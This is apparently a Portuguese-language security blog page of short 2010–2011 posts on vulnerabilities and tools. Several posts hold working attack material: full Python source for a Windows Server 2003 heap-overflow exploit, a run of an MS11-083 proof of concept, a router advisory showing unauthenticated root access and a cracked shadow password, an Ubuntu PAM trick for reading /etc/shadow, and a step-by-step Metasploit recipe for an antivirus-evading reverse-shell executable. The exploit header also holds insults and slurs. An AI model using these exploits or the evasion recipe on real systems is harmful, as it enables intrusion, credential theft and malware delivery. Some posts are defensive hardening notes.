Category: Security


PoC MS11-083

Filed Under: Hacking, Security by admin — Leave a comment
14 de novembro de 2011

Informado pela sans..

An integer overflow in the TCP/IP stack allows random code execution from a stream of UDP packets sent to a closed port. Permission for the attacker are at kernel level.

Depois de sair o exploit para a vulnerabilidade MS11-083 realizei a prova de conceito para verificar o que ocorre na tal situação.

A Mirosoft informou que para se explorada será necessário enviar aproximadamente 2^32 pacotes UDP para obter êxito na exploração.

No lab temos um Debian que faz o ataque e o Windows 2003 Standard com 1Gb de memória RAM 4 CPU’s que será atacado.

O exploit divulgado publicamente: http://packetstormsecurity.org/files/106873/winnuke2011.sh.txt , utilizei somente o código em C .

 

Compilando….

debian:~/2003# gcc -lpthread MS11-083.c -o MS11-083

debian:~/2003# ./MS11-083
[+] MS11-083 DoS/PoC exploit
[!] Usage : ./MS11-083 <server> <port>

 

No Windows.. tudo sobre controle..

 

Antes do Ataque

Antes do Ataque

 

 

Começamos o ataque…

debian:~/2003# ./MS11-083 192.168.10.131 1000
[+] MS11-083 DoS/PoC exploit
[-] Sending payload ‘ZSW”<kc’ULJ=VK%XE-cP0*%(‘bORT=”;D”[c=S'
[-] Thread number 0 started
[-] Sending payload ’60&a;%=^,7FKMc[D=J>90J6Y7DR]*PC<&8′.%) ‘
[-] Thread number 1 started
[-] Sending payload ‘dCJe-f+65f9@NJhH-c”!?XU% (7#TDOhjIa+`=_)’
[-] Thread number 2 started
[-] Sending payload ‘/;.S”0:#dd=kSACiD=S!OLO#V/ZLP<]L`?,/D$’
[-] Thread number 3 started
[-] Sending payload ‘”S.Q]=JOT” (8%O)-4bF+NeN I@**A<.Di/RV\5>’
[-] Thread number 4 started
[-] Sending payload ‘Ag0BMF”FF[ aB]*9*UQi<2H!8X&LieC>`U1AKQ7B’
[-] Thread number 5 started
[-] Sending payload ‘,=aTOe9-]”A&,B-;:b,f0<@BVX#VbM’WQD;K_f’
[-] Thread number 6 started
[-] Sending payload ‘AH2M R!h\+#H>e.VD-bDI;1″JJ’ JeQG6Sg2C’
[-] Thread number 7 started
[-] Sending payload ‘*X-KOSYQF!86#M53C^f1Z+jM=*+[.e56&0h)kiQ'
[-] Thread number 8 started

 

Em questão de segundos veremos o gráfico de performace do Windows..

Após o ataque

Após o ataque

Em outro console temos a saída do tcpdump

debian:~/2003# tcpdump -X -vvv -i eth0 dst host 192.168.10.131
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
23:47:47.221788 IP (tos 0×0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 69) 192.168.10.128.33405 > 192.168.10.131.1000: [udp sum ok] UDP, length 41
0×0000:  4500 0045 0000 4000 4011 a454 c0a8 0a80  E..E..@.@..T….
0×0010:  c0a8 0a83 827d 03e8 0031 bee0 6250 5d2a  …..}…1..bP]*
0×0020:  3b2e 5028 246a 5d3d 5632 273b 3a49 2156  ;.P($j]=V2′;:I!V
0×0030:  2069 3a2d 3725 5f22 5723 284d 5536 2741  .i:-7%_”W#(MU6′A
0×0040:  465a 4b4c 00                             FZKL.
23:47:47.221846 IP (tos 0×0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 69) 192.168.10.128.33405 > 192.168.10.131.1000: [udp sum ok] UDP, length 41
0×0000:  4500 0045 0000 4000 4011 a454 c0a8 0a80  E..E..@.@..T….
0×0010:  c0a8 0a83 827d 03e8 0031 bee0 6250 5d2a  …..}…1..bP]*
0×0020:  3b2e 5028 246a 5d3d 5632 273b 3a49 2156  ;.P($j]=V2′;:I!V
0×0030:  2069 3a2d 3725 5f22 5723 284d 5536 2741  .i:-7%_”W#(MU6′A
0×0040:  465a 4b4c 00                             FZKL.
23:47:47.221850 IP (tos 0×0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 69) 192.168.10.128.33405 > 192.168.10.131.1000: [udp sum ok] UDP, length 41
0×0000:  4500 0045 0000 4000 4011 a454 c0a8 0a80  E..E..@.@..T….
0×0010:  c0a8 0a83 827d 03e8 0031 bee0 6250 5d2a  …..}…1..bP]*
0×0020:  3b2e 5028 246a 5d3d 5632 273b 3a49 2156  ;.P($j]=V2′;:I!V
0×0030:  2069 3a2d 3725 5f22 5723 284d 5536 2741  .i:-7%_”W#(MU6′A
0×0040:  465a 4b4c 00                             FZKL.
23:47:47.221853 IP (tos 0×0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 69) 192.168.10.128.33405 > 192.168.10.131.1000: [udp sum ok] UDP, length 41
0×0000:  4500 0045 0000 4000 4011 a454 c0a8 0a80  E..E..@.@..T….
0×0010:  c0a8 0a83 827d 03e8 0031 bee0 6250 5d2a  …..}…1..bP]*
0×0020:  3b2e 5028 246a 5d3d 5632 273b 3a49 2156  ;.P($j]=V2′;:I!V
0×0030:  2069 3a2d 3725 5f22 5723 284d 5536 2741  .i:-7%_”W#(MU6′A
0×0040:  465a 4b4c 00                             FZKL.
23:47:47.221856 IP (tos 0×0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 69) 192.168.10.128.33405 > 192.168.10.131.1000: [udp sum ok] UDP, length 41
0×0000:  4500 0045 0000 4000 4011 a454 c0a8 0a80  E..E..@.@..T….
0×0010:  c0a8 0a83 827d 03e8 0031 bee0 6250 5d2a  …..}…1..bP]*
0×0020:  3b2e 5028 246a 5d3d 5632 273b 3a49 2156  ;.P($j]=V2′;:I!V
0×0030:  2069 3a2d 3725 5f22 5723 284d 5536 2741  .i:-7%_”W#(MU6′A
0×0040:  465a 4b4c 00                             FZKL.

 

Nesta situação temos somente 1 computador atacando, o script esta utilizando toda a CPU do Debian.

PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
3541 root         20   0  273m    976  484   S  97.2     0.2           0:16.40 MS11-083

 

No atual lab não conseguimos causar um DoS no alvo, mas de acordo com os resultados vimos que isso seria possível seeeeeeeeee… o firewall estivesse desabilitado….

Agora vamos habilitar o firewall do windows, e voltaremos ao ataque e os gráficos…

 

Firewalled

Firewalled

 

Ou seja, o ataque pode ser mitigado sem muitos problemas. Para completar os 2^32 pacotes enviados levaria aproximadamente 52 dias, paramos por aqui sem a verdadeira prova que seria possível executar um código remotamente.

Mais informações sobre o Bug: http://technet.microsoft.com/en-us/security/bulletin/ms11-083

Resumindo, sempre firewall ativado e sistema atualizado!

Outro exploit e mais infos pode ser encontrado também em: http://blog.rootentropy.co.za/post/12567851289/ms11-083-traffic-capture

 

[]‘s

Sergito

Tags: , , , ,
Comment

Kernel 2.6.30 Local Root Exploit

Filed Under: Ferramentas, Hacking, Linux, Security by admin — Leave a comment
3 de outubro de 2011
Mais um xploit para kernel 2.6.30....

http://1337day.com/exploits/16993

[]'s
Sérgito
Tags: , ,
Comment

killapache redone

Filed Under: Hacking, Security by admin — Leave a comment
3 de outubro de 2011

Depois do killapache codado pelo kingcope, saiu publicamente hoje a nova versão modificada por “S4(uR4″. Postado no pastebin, segue link abaixo:

http://pastebin.com/gWB76qmj

 

[]‘s

Sergito

Tags: ,
Comment

LFI com phpinfo

Filed Under: Hacking, Security by admin — Leave a comment
8 de setembro de 2011

Algo que ja era discutido anteriormente pelos russos caiu na mídia ontem,  mas a novidade desta vez é a utilização do php.info para injetar arquivos e ler outros arquivos do alvo.

Como??

A saída do PHPinfo() contém valores das variáveis PHP que utilizam o _GET, _POST e uploaded _FILES. Enquanto a requisição é feita, é escrito no /tmp um arquivo temporário que será a saída da chamada do phpinfo() que depois do processamento será deletada. Seguindo esta lógica… não conseguiu imaginar??

Segue o link do paper completo que foi descoberto pelo time da insomniasec: http://www.insomniasec.com/publications/LFI%20With%20PHPInfo%20Assistance.pdf

Não são em todas condições que é válido, mas na grande maioria..

 

[]‘s

Sérgito

Tags: ,
Comment

Engenharia Reversa do Skype

Filed Under: Hacking, Notícias, Security by admin — Leave a comment
3 de junho de 2011

Há alguns meses atrás o código criptográfico do skype foi quebrado pelo Sean O’Neil onde foi divulgado o source do mesmo http://cryptolib.com/ciphers/skype/ ou http://pastebin.com/GHUc2pAX

Desta vez foi realizado uma engenharia reversa pelo Efim Bushmanov, que fez uma análise mais a fundo e publicou no seu blog os sources e binários.

Algo realmente muito interessante que você pode ver: http://skype-open-source.blogspot.com/2011/06/skype-protocol-reverse-engineered.html

Com os sources publicamente divulgados e a compra do Skype pela Microsoft, ééé, eu pensaria 2x antes de falar algo.

 

[]‘s

Sergito

Tags: ,
Comment

ModSecurity New Version

Filed Under: Ferramentas, Linux, Security, Utilitarios by admin — Leave a comment
17 de fevereiro de 2011

Saiu do forno a nova versão do Modsecurity, mudanças? algumas, abaixo o changelog:

————————–

Version 2.1.2 – 02/17/2011

————————–

Improvements:

- Added experimental real-time application profiling ruleset.

- Added experimental Lua script for profiling the # of page scripts, iframes, etc..

which will help to identify successful XSS attacks and planting of malware links.

- Added new CSRF detection rule which will trigger if a subsequent request comes too

quickly (need to use the Ignore Static Content rules).

Bug Fixes:

- Added missing ” in the skipAfter SecAction in the CC Detection rule set

 

 

Download: http://sourceforge.net/projects/mod-security/files/modsecurity-crs/0-CURRENT/

 

[]‘s

Sergito

Tags: ,
Comment

Linksys WAP610N Unauthenticated Access With Root Privileges

Filed Under: Hacking, Security by admin — Leave a comment
17 de fevereiro de 2011
Só rindo mesmo...
telnet <access-point IP> 1111
Command> system id
Output>  uid=0(root) gid=0(root)


Secure Network - Security Research Advisory

Vuln name: Linksys WAP610N Unauthenticated Access With Root Privileges
Systems affected: WAP610N (Firmware Version: 1.0.01)
Systems not affected: --
Severity: High
Local/Remote: Remote
Vendor URL: http://www.linksysbycisco.com
Author(s): Matteo Ignaccolo m.ignaccolo@securenetwork.it
Vendor disclosure: 14/06/2010
Vendor acknowledged: 14/06/2010
Vendor bugfix: 14/12/2010 (reply to our request for update)
Vendor patch release: ??
Public disclosure: 10/02/2011
Advisory number: SN-2010-08
Advisory URL: http://www.securenetwork.it/ricerca/advisory/download/SN-2010-08.txt

*** SUMMARY ***

Linksys WAP610N is a SOHO wireless access point supporting 802.11n draft.

Unauthenticated remote textual administration console has been found that allow an attacker to run system command as root user.

*** VULNERABILITY DETAILS ***

telnet <access-point IP> 1111

Command> system id
Output>  uid=0(root) gid=0(root)

Coomand> system cat /etc/shadow
Ouptup>  root:$1$ZAwqf2dI$ZukbihyQtUghNDsLAQaP31:10933:0:99999:7:::
Ouptup>  bin:*:10933:0:99999:7:::
Ouptup>  daemon:*:10933:0:99999:7:::
Ouptup>  adm:*:10933:0:99999:7:::
Ouptup>  lp:*:10933:0:99999:7:::
Ouptup>  sync:*:10933:0:99999:7:::
Ouptup>  shutdown:*:10933:0:99999:7:::
Ouptup>  halt:*:10933:0:99999:7:::
Ouptup>  uucp:*:10933

root password is "wlan" (cracked with MDcrack http://mdcrack.openwall.net)

List of console's command:

ATHENA_READ
ATHENA_WRITE
CHIPVAR_GET
DEBUGTABLE
DITEM
DMEM
DREG16
DREG32
DREG8
DRV_CAT_FREE
DRV_CAT_INIT
DRV_NAME_GET
DRV_VAL_GET
DRV_VAL_SET
EXIT
GENIOCTL
GETMIB
HELP
HYP_READ
HYP_WRITE
HYP_WRITEBUFFER
ITEM16
ITEM32
ITEM8
ITEMLIST
MACCALIBRATE
MACVARGET
MACVARSET
MEM_READ
MEM_WRITE
MTAPI
PITEMLIST
PRINT_LEVEL
PROM_READ
PROM_WRITE
READ_FILE
REBOOT
RECONF
RG_CONF_GET
RG_CONF_SET
RG_SHELL
SETMIB
SHELL
STR_READ
STR_WRITE
SYSTEM
TEST32
TFTP_GET
TFTP_PUT
VER

*** EXPLOIT ***

Attackers may exploit these issues through a common telnet client as explained above.

*** FIX INFORMATION ***

No patch is available.

*** WORKAROUNDS ***

Put access points on separate wired network and filter network traffic to/from 1111 tcp port.

[]‘

Sergito

Tags: ,
Comment

MS Windows Server 2003 Remote Heap Overflow

Filed Under: Hacking, Security by admin — Leave a comment
15 de fevereiro de 2011

Sem muitos comentários, simples e direto, Windows 2003 server remote Heap Overflow !

 

####################################################################################
#MS Windows Server 2003 AD Pre-Auth BROWSER ELECTION Remote Heap Overflow
#Release date: 2011-02-14
#Anonymous Comment: Apologies if this puts a downer on the MSRC valentines
day sausage fest
#Author: Cupidon-3005
#Greet: Winny Thomas, Laurent Gaffie, h07
#Bug: Heap Overflow
#Remote Exploitability: Unlikely
#Local Exploitability: Likely
#Context: Broadcast, Pre-Auth
#Special Valentines Greetings: Ruben Santamarta, is your password still
"hijodeputa"? You look even more like a dumb fuck than you used to.
#From dailydave: [
https://lists.immunityinc.com/pipermail/dailydave/20110121/000057.html], So
your 31337 con is the only place to get 0day? Here's some pre-auth /
#broadcast 0day free for all on FD with 0% conference whoring, and punks are
welcome as well.
#####################################################################################
#Mrxsmb.sys, around BowserWriteErrorLog+0x175, while trying to copy 1go from
ESI to EDI ...
#Code will look something like this:
#if ((Len + 1) * sizeof(WCHAR)) > TotalBufferSize) { Len =
TotalSize/sizeof(WCHAR) - 1; }
#-1 causes Len to go 0xFFFFFFFF
#Feel free to reuse this code without restrictions and ask Kingcope-Fag to
perform his FTP FU on SMB, he might have more luck than MS.
"
import socket,sys,struct
from socket import *

if len(sys.argv)<=4:
 sys.exit("""usage: python sploit.py UR-IP BCAST-IP NBT-NAME AD-NAME
 example: python sploit.py 192.168.1.10 192.168.1.255 OhYeah
AD-NETBIOS-NAME""")

ourip = sys.argv[1]
host = sys.argv[2]
srcname = sys.argv[3].upper()
dstname = sys.argv[4].upper()

ELEC            = "\x42\x4f\x00"
WREDIR          = "\x41\x41\x00"

def encodename(nbt,service):
    final = '\x20'+''.join([chr((ord(i)>>4) + ord('A'))+chr((ord(i)&0xF) +
ord('A')) for i in nbt])+((15 - len(nbt)) * str('\x43\x41'))+service
    return final

def lengthlittle(packet,addnum):
    length = struct.pack("<i", len(packet)+addnum)[0:2]
    return length

def lengthbig(packet,addnum):
    length = struct.pack(">i", len(packet)+addnum)[2:4]
    return length

def election(srcname):
    elec = "\x08"
    elec+= "\x09" #Be the boss or die
    elec+= "\xa8\x0f\x01\x20" #Be the boss or die
    elec+= "\x1b\xe9\xa5\x00" #Up time
    elec+= "\x00\x00\x00\x00" #Null, like SDLC
    elec+= srcname+"\x00"
    return elec

def smbheaderudp(op="\x25"):
    smbheader= "\xff\x53\x4d\x42"
    smbheader+= op
    smbheader+= "\x00"
    smbheader+= "\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00\x00\x00\x00\x00\x00\x00"
    smbheader+=  "\x00\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00"
    return smbheader

def
trans2mailslot(tid="\x80\x0b",ip=ourip,sname="LOVE-SDL",dname="SRD-LOVE",namepipe="\MAILSLOT\BROWSE",srcservice="\x41\x41\x00",dstservice="\x41\x41\x00",pbrowser=""):
    packetbrowser  =  pbrowser
    packetmailslot = "\x01\x00"
    packetmailslot+= "\x00\x00"
    packetmailslot+= "\x02\x00"
    packetmailslot+= lengthlittle(packetbrowser+namepipe,4)
    packetmailslot+= namepipe +"\x00"
    packetdatagram = "\x11"
    packetdatagram+= "\x02"
    packetdatagram+= tid
    packetdatagram+= inet_aton(ip)
    packetdatagram+= "\x00\x8a"
    packetdatagram+= "\x00\xa7"
    packetdatagram+= "\x00\x00"
    packetdatagramname = encodename(sname,srcservice)
    packetdatagramname+= encodename(dname,dstservice)
    smbheader= smbheaderudp("\x25")
    packetrans2 = "\x11"
    packetrans2+= "\x00\x00"
    packetrans2+= lengthlittle(packetbrowser,0)
    packetrans2+= "\x00\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= "\x00"
    packetrans2+= "\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= "\xe8\x03\x00\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= lengthlittle(packetbrowser,0)
    packetrans2+= lengthlittle(smbheader+packetrans2+packetmailslot,4)
    packetrans2+= "\x03"
    packetrans2+= "\x00"
    andoffset = lengthlittle(smbheader+packetrans2+packetmailslot,2)
    lengthcalc =
packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser
    packetfinal =
packetdatagram+packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser
    packetotalength = list(packetfinal)
    packetotalength[10:12] = lengthbig(lengthcalc,0)
    packetrans2final = ''.join(packetotalength)
    return packetrans2final

def sockbroad(host,sourceservice,destservice,packet):
   s = socket(AF_INET,SOCK_DGRAM)
   s.setsockopt(SOL_SOCKET, SO_BROADCAST,1)
   s.bind(('0.0.0.0', 138))
   try:
      packsmbheader = smbheaderudp("\x25")
      buffer0 =
trans2mailslot(tid="\x80\x22",ip=ourip,sname=srcname,dname=dstname,namepipe="\MAILSLOT\BROWSER",srcservice=sourceservice,
dstservice=destservice, pbrowser=packet)
      s.sendto(buffer0,(host,138))
   except:
      print "expected SDL error:", sys.exc_info()[0]
      raise

sockbroad(host,WREDIR,ELEC,election("A" * 410)) # -> Zing it! (between
~60->410)
print "Happy St-Valentine Bitches\nMSFT found that one loooooooong time
ago...."
####################################################################################


by packetstormsecurity




[]'s


Sergito


 

			


			

				
Tags: , , 

				

					
													Comment 
											
				

			


		


		

		


			

				
Pergunte ao Pentester

				

					
Filed Under: Hacking, Notícias, pentest, Security by admin — Leave a comment

					
20 de janeiro de 2011

				

			


			

				
Muito boa a iniciativa!! Tire suas dúvidas!!


http://www.ask-a-pentester.com/


 


[]‘s


Sergito

			


			

				
Tags: 

				

					
													Comment 
											
				

			


		


		

		


			

				
Backdoor no IPSec

				

					
Filed Under: malware, Notícias, Security by admin — Leave a comment

					
15 de dezembro de 2010

				

			


			

				
Em alguns instantes atrás, Theo Raadt, o fundador do OpenBSD, soltou na lista algo que me deixou curioso pra saber o final desta história que apenas começou.


Um antigo desenvolvedor do OpenBSD teria ganho $$ do governo a anos atrás para injetar uma backdoor na pilha do IPSec.


Theo convida todos a analisar o código do IPSec, pois segundo ele, nada de errado existe dentro de bocados de códigos do IPSec.


Vejam o e-mail e a resposta do Theo:


http://marc.info/?l=openbsd-tech&m=129236621626462&w=2


A resposta dada pelo principal envolvido na história..


http://marc.info/?l=openbsd-tech&m=129244045916861&w=2


[]‘ Sergito

			


			

				
Tags: , , 

				

					
													Comment 
											
				

			


		


		

		


			

				
cve details

				

					
Filed Under: Security, Utilitarios by admin — Leave a comment

					
7 de novembro de 2010

				

			


			

				
Site muito interessante, com as entradas cve, o site gera gráficos por fabricantes, produtos, versões entre outras informações úteis com uma interface muito fácil de utilizar, veja abaixo:


Browse vendor names


Total number of vendors found = 802






Vendor Name
Products
Vulnerabilities




Microsoft
301
2470




Mozilla
14
766




Mandrakesoft
7
140




Macromedia
21
118




Mambo
66
111




Mysql
8
103




MIT
5
78




Mcafee
56
72




Moodle
1
69




Mybulletinboard
1
66




Mailenable
7
48




Mantis
1
47




Mediawiki
3
43




Mywebland
5
35






http://cvedetails.com/


[]‘s


Sergito

			


			

				
Tags: 

				

					
													Comment 
											
				

			


		


		

		


			

				
Ubuntu PAM vulnerability

				

					
Filed Under: Hacking, Linux, Security by admin — Leave a comment

					
31 de julho de 2010

				

			


			

				
Semana passada surgiu um bug no Windows que afetava diretamente os links, isso mesmo!!  algum hacker podem usar um arquivo de atalho malicioso, identificado pela extensão “.lnk”, para automaticamente executar o malware. Até a data de Hoje, não há correção para a falha que afeta desde o Windows 2000 até as versões do Windows 7.


Alguns papers explicam como mitigar o ataque, um exemplo é o paper escrito pelo Didier stevens (http://blog.didierstevens.com/2010/07/20/mitigating-lnk-exploitation-with-srp/), mas como o tópico não fala diretamente disso, eu acabei linkando com esse assunto pois uma falha que surgiu a umas semanas atrás, que afeta o módulo do PAM no Ubuntu LTS utiliza os links para poder ser explorada. Já com um patch publicado é aconselhável aplica-lo, explorando a falha não é possível escalar privilégios diretamente, mas é possível ler o /etc/shadow, e dai em diante……… =D Vejam abaixo:


trash@trash-desktop:~$ id


uid=1000(trash) gid=1000(trash) grupos=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),122(sambashare),1000(trash)


trash@trash-desktop:~$ rm -rf .cache/


trash@trash-desktop:~$ ls -la /etc/shadow


-rw-r—– 1 root shadow 1289 2010-07-31 17:19 /etc/shadow


trash@trash-desktop:~$ ln -s /etc/shadow ~/.cache


trash@trash-desktop:~$ ssh localhost


The authenticity of host ‘localhost (::1)’ can’t be established.


RSA key fingerprint is 86:cb:81:06:41:72:c4:f5:0f:7d:56:7f:5e:82:72:26.


Are you sure you want to continue connecting (yes/no)? yes


Warning: Permanently added ‘localhost’ (RSA) to the list of known hosts.


trash@localhost’s password:




Linux trash-desktop 2.6.32-21-generic #32-Ubuntu SMP Fri Apr 16 08:10:02 UTC 2010 i686 GNU/Linux


Ubuntu 10.04 LTS


Welcome to Ubuntu!


* Documentation:  https://help.ubuntu.com/


The programs included with the Ubuntu system are free software;


the exact distribution terms for each program are described in the


individual files in /usr/share/doc/*/copyright.


Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by


applicable law.


Last login: Sun Jul 25 04:18:47 2010 from localhost


trash@trash-desktop:~$ ls -la /etc/shadow


-rw-r—– 1 trash trash 1289 2010-07-31 17:19 /etc/shadow


trash@trash-desktop:~$ tail /etc/shadow =)






Simples assim…


Patch: http://bazaar.launchpad.net/~ubuntu-branches/ubuntu/karmic/pam/karmic-updates/revision/58


Referência: http://www.ubuntu.com/usn/usn-959-1


[]‘s


Sergito

			


			

				
Tags: , , 

				

					
													Comment 
											
				

			


		


		

		


			

				
Microsoft Windows Local Privilege Escalation Vulnerability

				

					
Filed Under: Hacking, Security by admin — Leave a comment

					
6 de julho de 2010

				

			


			

				
Uma falha que afeta grande parte do windows Vista e 2008 server foi publicada recentemente juntamente com o seu exploit no securityfocus. A falha local explora diretamente o kernel do windows e se vulnerável escala privilégios, caso contrário pode causar um DoS. Vale a pena conferir e testar..






Vulnerable:
Microsoft Windows Vista Ultimate 64-bit edition SP2

Microsoft Windows Vista Ultimate 64-bit edition SP1

Microsoft Windows Vista Home Premium 64-bit edition SP2

Microsoft Windows Vista Home Premium 64-bit edition SP1

Microsoft Windows Vista Home Basic 64-bit edition SP2

Microsoft Windows Vista Home Basic 64-bit edition SP1

Microsoft Windows Vista Enterprise 64-bit edition SP2

Microsoft Windows Vista Enterprise 64-bit edition SP1

Microsoft Windows Vista Business 64-bit edition SP2

Microsoft Windows Vista Business 64-bit edition SP1

Microsoft Windows Vista Ultimate SP2

Microsoft Windows Vista Ultimate SP1

Microsoft Windows Vista Home Premium SP2

Microsoft Windows Vista Home Premium SP1

Microsoft Windows Vista Home Basic SP2

Microsoft Windows Vista Home Basic SP1

Microsoft Windows Vista Enterprise SP2

Microsoft Windows Vista Enterprise SP1

Microsoft Windows Vista Business SP2

Microsoft Windows Vista Business SP1

Microsoft Windows Server 2008 for x64-based Systems SP2

Microsoft Windows Server 2008 for x64-based Systems 0

Microsoft Windows Server 2008 for Itanium-based Systems SP2

Microsoft Windows Server 2008 for Itanium-based Systems 0

Microsoft Windows Server 2008 for 32-bit Systems SP2

Microsoft Windows Server 2008 for 32-bit Systems 0		











Mais info.. http://www.securityfocus.com/bid/41280/info


[]‘s


Sergito

			


			

				
Tags: , 

				

					
													Comment 
											
				

			


		


		

		


			

				
DLP (Data Loss Prevention) Open Source

				

					
Filed Under: Ferramentas, Linux, Security by admin — Leave a comment

					
7 de maio de 2010

				

			


			

				
Você sabe o que são soluções DLP? Sua empresa não utiliza nada parecido ou vc não sabe do que se trata? DLP (Data Loss Prevention) são soluções para previnir o vazamento de informações de dentro da sua empresa, não basta somente existir aquela  “Política de Uso dos Ativos Virtuais” ou “Termo de compromisso de Confidencialidade” pois não é o suficiente para garantir a segurança dos dados.


Muitos servidores de anti-spam tem uma inspeção de e-mails que são enviado de dentro da empresa, denunciando assim algum tipo de vazamento de informação. Mas não é sobre isso que este post vem a dizer, e sim sobre um recente software open source que é uma alternativa aos appliance caríssimos que se tem no mercado.


Ele se chama OpenDLP , vale a pena testar pois atá o momento não conhecia algo open source que faz este tipo de auditoria. Ainda não testei, mas em breve postarei mais comentários sobre a ferramenta.


Link: http://www.darknet.org.uk/2010/05/opendlp-free-open-source-data-loss-prevention-dlp-tool/


[]‘s


Sergito

			


			

				
Tags: 

				

					
													Comment 
											
				

			


		


		

		


			

				
Bypass AV em 5 etapas

				

					
Filed Under: Ferramentas, Hacking, Security by admin — 2 Comments

					
1 de março de 2010

				

			


			

				
Depois de algumas pesquisas na net, consegui criar um executável com o msfencode no qual faz um “reverse shell” sendo detectável apenas por 3 AV’s. Um vídeo do pauldotcom demonstra como fazer, porém a grande sacada não é explicada no vídeo, quando é injetado strings do notepad.exe dentro do “malware”, então.. mãos a obra!!


Primeiramente vc precisará do metasploit instalado e de preferência atualizado, eu utilizei o BT4 e um windows xp para a execução do malware.


1) Vamos copiar o notepad.exe de alguma máquina windows para o diretório de templates do msfencode, porque será essencial para a criação do malware.




Como visto acima, o notepad.exe deverá ficar no /opt/metasploit3/msf3/data/templates


2) Agora injetaremos o payload no executável, para isso voltaremos ao diretório /opt/metasploit3/msf3 e executaremos:


msfpayload windows/shell/reverse_tcp LHOST=192.168.48.142 LPORT=4444 R | ./msfencode -x notepad.exe -t exe -e x86/shikata_ga_nai -o malware1.exe


No qual o ip 192.168.48.142(bt4) é onde o alvo do nosso malware irá tentar conectar na porta 4444.




3) Arquivo criado, agora vamos verificar com o vitus total para tirar a prova!




Maravilha!! Avg, Symantec e Microsoft, estes foram os 3 AV’s que detectaram o nosso malware:


http://www.virustotal.com/pt/analisis/50d138c0dd8ac5bd75590d8a688473558d07cb1468fe7091b5b5e2a57d0a5339


4) Agora iremos executar e verificar se tudo esta ocorrendo bem! ;) 


Primeiramente, no seu bt4 (192.168.48.142), na pasta /opt/metasploit3/msf3/, execute:


msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.48.142 LPORT=4444 E






5) Agora nosso bt4 já esta pronto para receber a conexão do nosso alvo, para isso só falta executar o malware….






e…. enquanto isso no bt4…


Pronto!! Feito!!







Dentre outras maneiras de injetar o payload, essa foi a mais eficaz contra os AV’s, alguns exemplos abaixo no qual tentei:


./msfpayload windows/shell/reverse_tcp LHOST=192.168.48.142 LPORT=4444 R | ./msfencode -b ‘ ‘ | ./msfencode -x notepad.exe -t exe -e x86/shikata_ga_nai -o malware2.exe







./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.48.142 LPORT=4444  R | ./msfencode -e x86/fnstenv_mov -b ‘\x00\xff’ -t raw | ./msfencode -b ‘ ‘ -t exe -o malware3.exe


[]‘s Sergito 







Referências:


http://pauldotcom.com/2010/02/bypassing-av-with-msfencode–x.html

			


			

				
Tags: , , 

				

					
													Comment 
											
				

			


		


		

		


			

				
Parando ataques Synflood em Windows

				

					
Filed Under: Security, Windows by admin — 1 Comment

					
28 de fevereiro de 2010

				

			


			

				
Há algumas semanas atrás eu postei como mitigar ataques synflood em linux, mudança de parâmetros do kernel e talz, nada muito ajuda quando o ataque é bem feito. O post de hoje ajuda a mitigar ataques synflood em windows, algo que eu não acredito muito mas pode ajudar em certas situações. ;) 


O conhecido BackLog…


reg add HKLM\System\CurrentControlSet\Services\AFD\Parameters /v EnableDynamicBacklog  /t REG_DWORD /d 1


reg add HKLM\System\CurrentControlSet\Services\AFD\Parameters /v MinimumDynamicBacklog  /t REG_DWORD /d 20


reg add HKLM\System\CurrentControlSet\Services\AFD\Parameters /v MaximumDynamicBacklog  /t REG_DWORD /d 20000


reg add HKLM\System\CurrentControlSet\Services\AFD\Parameters /v DynamicBacklogGrowthDelta  /t REG_DWORD /d 10




Proteção contra SynFlood…


reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v SynAttackProtect  /t REG_DWORD /d 1


Diminuindo o tempo das conexões abertas…


reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v TcpMaxConnectResponseRetransmissions  /t REG_DWORD /d 2


Existe também um módulo para o IIS onde é possível proteger-se contra DoS e ataques brute force bloqueando ip’s dinamicamente, segue abaixo as referências:


http://learn.iis.net/page.aspx/548/using-dynamic-ip-restrictions/


Referências…


http://support.microsoft.com/default.aspx?scid=kb;[LN];142641


Para Solaris, HP-UX etc.. paper muito Bom!!


http://www.securityfocus.com/infocus/1729


[]‘s Sergito

			


			

				
Tags: , , 

				

					
													Comment 
											
				

			


		


		

		


			

				
Guia rápido do Hping

				

					
Filed Under: Security by admin — Leave a comment

					
28 de fevereiro de 2010

				

			


			

				
Guia rápido do Hping3, pra colar na porta do armário!! :D 


hping3_cheatsheet_v1.0-ENG


[]‘s Sergito

			


			

				
Tags: , 

				

					
													Comment 
											
				

			


		


		

		


			

				
Guia rápido do Nmap

				

					
Filed Under: Security by admin — Leave a comment

					
28 de fevereiro de 2010

				

			


			

				
Guia rápido do nmap, pra colar na geladeira!! haha


Nmap5 cheatsheet eng v1


[]‘s Sergito

			


			

				
Tags: , 

				

					
													Comment 
											
				

			


		


		

		


			

				
Análise do TDSS/TDL3

				

					
Filed Under: Security by admin — Leave a comment

					
22 de fevereiro de 2010

				

			


			

				
OLáaa a todos!! depois de muitos 0days rolando por aé, venho para mais um post, mas dessa vez é só um paper muito interessante, sobre o virus que esta causando um estrago bem grande por ae.. já são 75 mil computadores infectados em todo o mundo.


Para quem gosta de escovar uns bits, segue abaixo o download.


Donwload:  tdl3 analysis paper


[]‘s Sergito

			


			

				
Tags: , 

				

					
													Comment 
											
				

			


		


		

		


			

				
Vmware + nmap + xploit

				

